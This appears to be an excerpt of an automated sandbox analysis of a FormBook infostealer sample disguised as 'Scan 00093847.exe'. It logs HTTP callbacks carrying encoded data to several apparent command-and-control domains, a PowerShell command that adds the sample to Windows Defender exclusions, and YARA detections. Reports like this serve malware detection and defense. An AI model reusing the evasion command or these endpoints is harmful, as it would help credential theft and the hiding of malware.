                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.angelenterprise.biz
                                          Referer: http://www.angelenterprise.biz/efkd/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          20 | 192.168.2.4 | 56249 | 3.33.130.190 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:02.232033014 CEST | 508 | OUT | GET /efkd/?GtLD=xFGdQ6FH&dxWljT6=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A= HTTP/1.1
                                          Host: www.angelenterprise.biz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:02.701323986 CEST | 397 | IN | HTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:45:02 GMT
                                          Content-Type: text/html
                                          Content-Length: 257
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GtLD=xFGdQ6FH&dxWljT6=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A="}</script></head></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          21 | 192.168.2.4 | 56250 | 13.248.169.48 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:07.755774021 CEST | 758 | OUT | POST /pjne/ HTTP/1.1
                                          Host: www.dyme.tech
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.dyme.tech
                                          Referer: http://www.dyme.tech/pjne/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=ojBWD/4D8HTYZJ9NBjS6mbziHzWM+Vkn5l6A9xxtdkVXkqKh00kiLDX2DeGPgOJ3eAqKBmYwK5hfYYxNqWRlpCAdIDLdAn0AfqucCb+vkv8qGs1RgoM7gANQJ01Yi3InqDTvotSQ9jbiGTA5oAPWShyw9yzwFra26ikaAAg7zKqazulYOU/MQ+Y8C7qVXMf1Og==


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          22 | 192.168.2.4 | 56251 | 13.248.169.48 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:10.784368992 CEST | 778 | OUT | POST /pjne/ HTTP/1.1
                                          Host: www.dyme.tech
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.dyme.tech
                                          Referer: http://www.dyme.tech/pjne/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=ojBWD/4D8HTYZq1NDA66zrzjLTWM01kj5l+A9zd9eRNXlOOh1xYiKDX2bOGK++J8eAv5BiQwK51fYapNqhlioSAfFjLfPH0AfqucCbqJkvkqG8lRgJM6+wNfK01Y0HJuqDTZouXL9gjiGTw5pVjRbhyywSyxF5rlzi56IQIFtb37yo0CflebC+8Pf8jhaPi8Vjmtgdm2kttwq0rjniAf6+I=


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          23 | 192.168.2.4 | 56252 | 13.248.169.48 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:13.815429926 CEST | 10860 | OUT | POST /pjne/ HTTP/1.1
                                          Host: www.dyme.tech
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.dyme.tech
                                          Referer: http://www.dyme.tech/pjne/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          24 | 192.168.2.4 | 56253 | 13.248.169.48 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:16.352130890 CEST | 498 | OUT | GET /pjne/?dxWljT6=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.dyme.tech
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:16.809504986 CEST | 397 | IN | HTTP/1.1 200 OK
                                          Server: openresty
                                          Date: Sat, 07 Sep 2024 19:45:16 GMT
                                          Content-Type: text/html
                                          Content-Length: 257
                                          Connection: close
                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dxWljT6=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&GtLD=xFGdQ6FH"}</script></head></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          25 | 192.168.2.4 | 56254 | 185.134.245.113 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:22.863348961 CEST | 782 | OUT | POST /3cch/ HTTP/1.1
                                          Host: www.lilibetmed.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.lilibetmed.online
                                          Referer: http://www.lilibetmed.online/3cch/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=OTKrJrPoX9Ljb4hS27BcB1z7MRNiKo2ToeE8M7aOMGls0iKSfGxk/6jVimDg/gy5KrDkEst5WGHxyLHd/ZRNCcDyrScxLcxdhsjtjWkSHwZu0S1QwVJkPmIS8QOPur6kSxaXWlyVvLV1X5awZCfSJmDMQCwS+cgHzX/XoUILripL0Ff1qC7ku5Qnsbqm+3MnBA==
                                          Sep 7, 2024 21:45:23.570417881 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                                          Server: nginx
                                          Date: Sat, 07 Sep 2024 19:45:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          26 | 192.168.2.4 | 56255 | 185.134.245.113 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:25.416908979 CEST | 802 | OUT | POST /3cch/ HTTP/1.1
                                          Host: www.lilibetmed.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.lilibetmed.online
                                          Referer: http://www.lilibetmed.online/3cch/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=OTKrJrPoX9LjYb5S1c1cHVz4QBNiDI2Xoe48M6ueMQ1s0GOScEZk46jVqGDliQyyKrOZEu55WGTxyK3d/qpODMD8+CczWsxdhsjtjWw4H09u0jFQzwplR2IR5gOP4b7vSxa5WkervNZ1X8+wYTfTcWDOPSxa5cUC+iWWgHwIy20uxDOv7zaz850UxcjSz0xuaCOqc3PyXkZh746FCKTXDyE=
                                          Sep 7, 2024 21:45:26.060398102 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                                          Server: nginx
                                          Date: Sat, 07 Sep 2024 19:45:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          27 | 192.168.2.4 | 56256 | 185.134.245.113 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:27.962165117 CEST | 10884 | OUT | POST /3cch/ HTTP/1.1
                                          Host: www.lilibetmed.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.lilibetmed.online
                                          Referer: http://www.lilibetmed.online/3cch/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:28.586628914 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                                          Server: nginx
                                          Date: Sat, 07 Sep 2024 19:45:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          28 | 192.168.2.4 | 56257 | 185.134.245.113 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:30.509696007 CEST | 506 | OUT | GET /3cch/?GtLD=xFGdQ6FH&dxWljT6=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI= HTTP/1.1
                                          Host: www.lilibetmed.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:31.255739927 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 07 Sep 2024 19:45:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Expires: Sat, 07 Sep 2024 20:45:31 GMT
                                          Cache-Control: max-age=3600
                                          Cache-Control: public
                                          Data Ascii: 153f<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.lilibetmed.online is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.log
                                          Sep 7, 2024 21:45:31.255825043 CEST | 1236 | IN
                                          Data Ascii: o { width: auto; max-height: 50px; margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 1
                                          Sep 7, 2024 21:45:31.255845070 CEST | 1236 | IN
                                          Data Ascii: ive website here. <br>Other services, such as e-mail, may be actively used by the owner.<br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.lilibetmed.online') + ' er registrert
                                          Sep 7, 2024 21:45:31.256377935 CEST | 1236 | IN
                                          Data Ascii: var i = typeof SVGRect != "undefined" ? "svg" : "png"; function q(s) { return document.getElementById(s); } </script> <div class="container"> <h1 id="t"> www.lilibetmed.online is park
                                          Sep 7, 2024 21:45:31.256390095 CEST | 766 | IN
                                          Data Ascii: img src="/images/flag-en.png" alt="English" title="English" onclick="setLang('en')" /> </div> </div> <div class="footer"> <span >Domeneshop AS &copy; 2024</spa


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          29 | 192.168.2.4 | 56258 | 103.42.108.46 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:36.620532990 CEST | 761 | OUT | POST /pn1r/ HTTP/1.1
                                          Host: www.mbwd.store
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.mbwd.store
                                          Referer: http://www.mbwd.store/pn1r/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=tIPs8k8l6Jqf3FRKPp7IogLTvnzJiXdM60Nb2BfLwT5FrIuy3/JH2WEoEhUJAtWYoKy1el1mQ4qPh5GkwX2WqBvQ8/aUkkyUFG0jZS1ZYiS2GdTvISYoZa8Oz+PSn6s4iu0aYSuF1oqqmUKe79lDioL1efKJyF0vH8bzO43dWyVZy7jLq3mjZ6H4oI8pCmivuw==
                                          Sep 7, 2024 21:45:37.494009972 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Sat, 07 Sep 2024 19:45:37 GMT
                                          Content-Length: 11
                                          Connection: close
                                          Data Ascii: Bad Request


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          30 | 192.168.2.4 | 56259 | 103.42.108.46 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:39.925390959 CEST | 781 | OUT | POST /pn1r/ HTTP/1.1
                                          Host: www.mbwd.store
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.mbwd.store
                                          Referer: http://www.mbwd.store/pn1r/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Ascii: dxWljT6=tIPs8k8l6JqflxVKc+vItALcz3zJs3dI60xb2EvbxhNFrqmy0+JH72EoPBUGddWloK+TegVmQ7WPh9CkxgaXpxvO1faFgkyUFG0jZSgEYiK2Hu7vPDYnFK8Bw+PS1Ks8iu04YQKr1qSqmRue7slMtoLJafL2+0RGBdz7Gau9WiA7z9yR7GH0L6jL1P1dPlfm1/M8caH3z5O2Frz7k8gwrL4=
                                          Sep 7, 2024 21:45:40.787250996 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Sat, 07 Sep 2024 19:45:40 GMT
                                          Content-Length: 11
                                          Connection: close
                                          Data Ascii: Bad Request


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          31 | 192.168.2.4 | 56260 | 103.42.108.46 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:42.468739986 CEST | 10863 | OUT | POST /pn1r/ HTTP/1.1
                                          Host: www.mbwd.store
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.mbwd.store
                                          Referer: http://www.mbwd.store/pn1r/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:43.320790052 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Sat, 07 Sep 2024 19:45:43 GMT
                                          Content-Length: 11
                                          Connection: close
                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                          Data Ascii: Bad Request


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          32 | 192.168.2.4 | 56261 | 103.42.108.46 | 80 | 4520 | C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Sep 7, 2024 21:45:45.012057066 CEST | 499 | OUT | GET /pn1r/?dxWljT6=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&GtLD=xFGdQ6FH HTTP/1.1
                                          Host: www.mbwd.store
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:45.913885117 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Sat, 07 Sep 2024 19:45:45 GMT
                                          Content-Length: 11
                                          Connection: close
                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                          Data Ascii: Bad Request


                                          Target ID:0
                                          Start time:15:42:41
                                          Start date:07/09/2024
                                          Path:C:\Users\user\Desktop\Scan 00093847.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Scan 00093847.exe"
                                          Imagebase:0xac0000
                                          File size:798'720 bytes
                                          MD5 hash:7C580B0BF94B5EDB15717136670A8092
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:15:42:55
                                          Start date:07/09/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"
                                          Imagebase:0xf0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:15:42:55
                                          Start date:07/09/2024
                                          Path:C:\Users\user\Desktop\Scan 00093847.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Scan 00093847.exe"
                                          Imagebase:0x5b0000
                                          File size:798'720 bytes
                                          MD5 hash:7C580B0BF94B5EDB15717136670A8092
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          Target ID:4
                                          Start time:15:42:55
                                          Start date:07/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:15:43:12
                                          Start date:07/09/2024
                                          Path:C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe"
                                          Imagebase:0xad0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:9
                                          Start time:15:43:14
                                          Start date:07/09/2024
                                          Path:C:\Windows\SysWOW64\setupugc.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\setupugc.exe"
                                          Imagebase:0x8b0000
                                          File size:118'784 bytes
                                          MD5 hash:342CBB77B3F4B3F073DF2F042D20E121
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
